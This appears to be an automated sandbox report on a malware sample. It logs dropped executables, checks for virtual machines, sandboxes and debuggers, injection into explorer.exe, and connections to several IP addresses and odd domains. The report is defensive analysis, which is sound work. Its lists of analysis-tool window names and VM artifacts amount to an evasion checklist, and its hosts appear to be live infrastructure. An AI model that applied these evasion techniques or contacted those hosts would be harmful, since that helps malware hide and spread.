Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\50E3.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\50E3.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\50E3.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\50E3.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Helper.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Helper.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Drivers\csrss.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Drivers\csrss.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Drivers\csrss.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Drivers\csrss.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Drivers\csrss.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Drivers\csrss.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Drivers\csrss.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Drivers\csrss.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Helper.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Helper.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\4A1B.exe

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\AppData\Local\Temp\4A1B.exe

File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: 38B4.exe, 00000006.00000003.2166948753.000000000200F000.00000004.00000020.00020000.00000000.sdmp, 38B4.exe, 00000006.00000003.2150578256.000000000200F000.00000004.00000020.00020000.00000000.sdmp, 38B4.exe, 00000006.00000003.2148883294.0000000002003000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SUPERANTISPYWARE.EXE
Source: vahvrsu, 00000005.00000002.2104709686.0000000002B8E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ASWHOOKM
Source: file.exe, 00000000.00000002.1805651077.0000000002C4E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ASWHOOK
Source: 8042.exe, 00000011.00000002.2425041742.0000000002C5E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ASWHOOK`.

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\38B4.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vahvrsu	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vahvrsu	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vahvrsu	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vahvrsu	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vahvrsu	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vahvrsu	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8042.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\8042.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\8042.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\8042.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\8042.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\8042.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\vahvrsu	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\vahvrsu	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\vahvrsu	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\vahvrsu	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\vahvrsu	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\vahvrsu	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\tdhvrsu	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\tdhvrsu	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\tdhvrsu	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\tdhvrsu	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\tdhvrsu	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\tdhvrsu	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI

Tries to detect sandboxes / dynamic malware analysis system (file name check)

Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\testAPP.exE
Source: C:\Users\user\AppData\Local\Temp\50E3.exe	Section loaded: \KnownDlls32\testAPP.exE

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Source: C:\Windows\explorer.exe TID: 6472	Thread sleep time: -80500s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6500	Thread sleep time: -82900s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6472	Thread sleep time: -114100s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\38B4.exe TID: 6848	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 2160	Thread sleep time: -11990383647911201s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 6804	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe TID: 3692	Thread sleep time: -12912720851596678s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe TID: 1712	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\50E3.exe TID: 2060	Thread sleep count: 4644 > 30
Source: C:\Users\user\AppData\Local\Temp\50E3.exe TID: 2060	Thread sleep time: -464400s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\50E3.exe TID: 7032	Thread sleep count: 113 > 30
Source: C:\Users\user\AppData\Local\Temp\50E3.exe TID: 7032	Thread sleep time: -75000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 3632	Thread sleep time: -30000s >= -30000s
Source: C:\ProgramData\Drivers\csrss.exe TID: 3140	Thread sleep count: 6050 > 30
Source: C:\ProgramData\Drivers\csrss.exe TID: 3140	Thread sleep time: -605000s >= -30000s
Source: C:\ProgramData\Drivers\csrss.exe TID: 4908	Thread sleep count: 5109 > 30
Source: C:\ProgramData\Drivers\csrss.exe TID: 4908	Thread sleep time: -510900s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\ProgramData\Drivers\csrss.exe	Last function: Thread delayed
Source: C:\ProgramData\Drivers\csrss.exe	Last function: Thread delayed
Source: C:\ProgramData\Drivers\csrss.exe	Last function: Thread delayed
Source: C:\ProgramData\Drivers\csrss.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 414	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 805	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 829	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 1141	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 870	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 854	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Window / User API: threadDelayed 4022	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Window / User API: threadDelayed 1225	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Window / User API: threadDelayed 2537	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Window / User API: threadDelayed 1075	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\50E3.exe	Window / User API: threadDelayed 4644
Source: C:\ProgramData\Drivers\csrss.exe	Window / User API: threadDelayed 6050
Source: C:\ProgramData\Drivers\csrss.exe	Window / User API: threadDelayed 5109

Source: C:\Users\user\AppData\Local\Temp\CL_Debug_Log.txt

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32.exe

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\38B4.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

Source: explorer.exe, 00000001.00000000.1793764047.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000001.00000000.1793089251.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
Source: explorer.exe, 00000001.00000000.1793089251.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NECVMWar VMware SATA CD00\w
Source: explorer.exe, 00000001.00000000.1793764047.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000001.00000000.1789050552.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
Source: explorer.exe, 00000001.00000000.1797247762.000000000CB21000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000001.00000000.1793764047.0000000009977000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: 50E3.exe, 00000010.00000003.2392623852.0000000003B14000.00000004.00000020.00020000.00000000.sdmp, 50E3.exe, 00000010.00000003.2395267241.0000000003DB0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: m SQ7jHGfSsmE5DB3dCbdtu7xJ7YSe34meVDElzhEjqOw
Source: explorer.exe, 00000001.00000000.1790741511.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTTAVMWare
Source: 50E3.exe	Binary or memory string: v8w-SL/Ftv+pjRFYI8FwoeCowlJ5RbnK8FxhAdZObGIg9Mg-SMFZ6GLlvmyuXTd02ktl9zxx++P7IT6chKCDyXK/DWc-SMVofzDNTBRFeeXvnyamlFsTqPujVbkVuNdz/6YBVP0-SN/19UXRnhKRbhdVJkk4cXVc2AFNlQHZGCT3EaC7/QE-SOhuAUg4o/K+Og9FBpa6hFa3XvA8T/Y6zkzd/jPCcn8-SQ7jHGfSsmE5DB3dCbdtu7xJ7YSe34meVDEl
Source: explorer.exe, 00000001.00000000.1793089251.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
Source: explorer.exe, 00000001.00000000.1793089251.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1793089251.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, 38B4.exe, 00000006.00000003.2205692406.00000000020BA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2371406020.0000000002C96000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2371406020.0000000002CC1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000001.00000000.1793764047.0000000009977000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000001.00000000.1790741511.0000000007A34000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBnx
Source: explorer.exe, 00000001.00000000.1793089251.0000000009660000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
Source: explorer.exe, 00000001.00000000.1789050552.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: AppLaunch.exe, 00000009.00000002.2375247351.0000000000578000.00000004.00000020.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2389137053.0000000001582000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 50E3.exe, 00000010.00000003.2466645518.00000000039B5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 0PJAMo57H/5p/LvmCi5uy4B2YM9XkLvneJ1FX6e/H4AYW3twOtPlAgMBAAE=
Source: explorer.exe, 00000001.00000000.1789050552.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\41CD.exe

Code function: 7_2_001564FA FindFirstFileExW,

7_2_001564FA

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Anti Debugging

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Hides threads from debuggers

Source: C:\Users\user\AppData\Local\Temp\4A1B.exe

Thread information set: HideFromDebugger

Jump to behavior

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\Desktop\file.exe	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vahvrsu	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8042.exe	System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Roaming\vahvrsu	System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Roaming\tdhvrsu	System information queried: CodeIntegrityInformation

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02AE0D90 mov eax, dword ptr fs:[00000030h]	0_2_02AE0D90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02AE092B mov eax, dword ptr fs:[00000030h]	0_2_02AE092B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02C67E96 push dword ptr fs:[00000030h]	0_2_02C67E96
Source: C:\Users\user\AppData\Roaming\vahvrsu	Code function: 5_2_02B30D90 mov eax, dword ptr fs:[00000030h]	5_2_02B30D90
Source: C:\Users\user\AppData\Roaming\vahvrsu	Code function: 5_2_02B3092B mov eax, dword ptr fs:[00000030h]	5_2_02B3092B
Source: C:\Users\user\AppData\Roaming\vahvrsu	Code function: 5_2_02BA6E9E push dword ptr fs:[00000030h]	5_2_02BA6E9E
Source: C:\Users\user\AppData\Local\Temp\41CD.exe	Code function: 7_2_001503C5 mov eax, dword ptr fs:[00000030h]	7_2_001503C5
Source: C:\Users\user\AppData\Local\Temp\41CD.exe	Code function: 7_2_001426D0 mov edi, dword ptr fs:[00000030h]	7_2_001426D0
Source: C:\Users\user\AppData\Local\Temp\41CD.exe	Code function: 7_2_00150409 mov eax, dword ptr fs:[00000030h]	7_2_00150409
Source: C:\Users\user\AppData\Local\Temp\41CD.exe	Code function: 7_2_0014CFB3 mov ecx, dword ptr fs:[00000030h]	7_2_0014CFB3
Source: C:\Users\user\AppData\Local\Temp\50E3.exe	Code function: 11_2_0288F0A3 push dword ptr fs:[00000030h]	11_2_0288F0A3
Source: C:\Users\user\AppData\Local\Temp\50E3.exe	Code function: 11_2_02A50042 push dword ptr fs:[00000030h]	11_2_02A50042
Source: C:\Users\user\AppData\Local\Temp\8042.exe	Code function: 17_2_02C40D90 mov eax, dword ptr fs:[00000030h]	17_2_02C40D90
Source: C:\Users\user\AppData\Local\Temp\8042.exe	Code function: 17_2_02C4092B mov eax, dword ptr fs:[00000030h]	17_2_02C4092B
Source: C:\Users\user\AppData\Local\Temp\8042.exe	Code function: 17_2_02C76CFD push dword ptr fs:[00000030h]	17_2_02C76CFD

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vahvrsu	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8042.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\vahvrsu	Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\tdhvrsu	Process queried: DebugPort

Source: C:\Users\user\AppData\Local\Temp\41CD.exe

Code function: 7_2_00145992 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

7_2_00145992

Source: C:\Users\user\AppData\Local\Temp\41CD.exe

Code function: 7_2_00159C43 GetProcessHeap,

7_2_00159C43

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_004029BA LdrLoadDll,

0_2_004029BA

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\41CD.exe	Code function: 7_2_00145992 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00145992
Source: C:\Users\user\AppData\Local\Temp\41CD.exe	Code function: 7_2_00145AF4 SetUnhandledExceptionFilter,	7_2_00145AF4
Source: C:\Users\user\AppData\Local\Temp\41CD.exe	Code function: 7_2_0014568F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_0014568F
Source: C:\Users\user\AppData\Local\Temp\41CD.exe	Code function: 7_2_001496E3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_001496E3

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 34.143.166.163 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.198.2.251 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 123.140.161.243 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.94.245.237 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: ssh.yah.o.com.net
Source: C:\Windows\explorer.exe	Network Connect: 175.126.109.15 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: il.cam
Source: C:\Windows\explorer.exe	Domain query: pop.loaquorezcil.com
Source: C:\Windows\explorer.exe	Domain query: relay.il.comuk
Source: C:\Windows\SysWOW64\explorer.exe	Network Connect: 91.215.85.17 80

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: 8042.exe.1.dr

Jump to dropped file

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\file.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vahvrsu	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
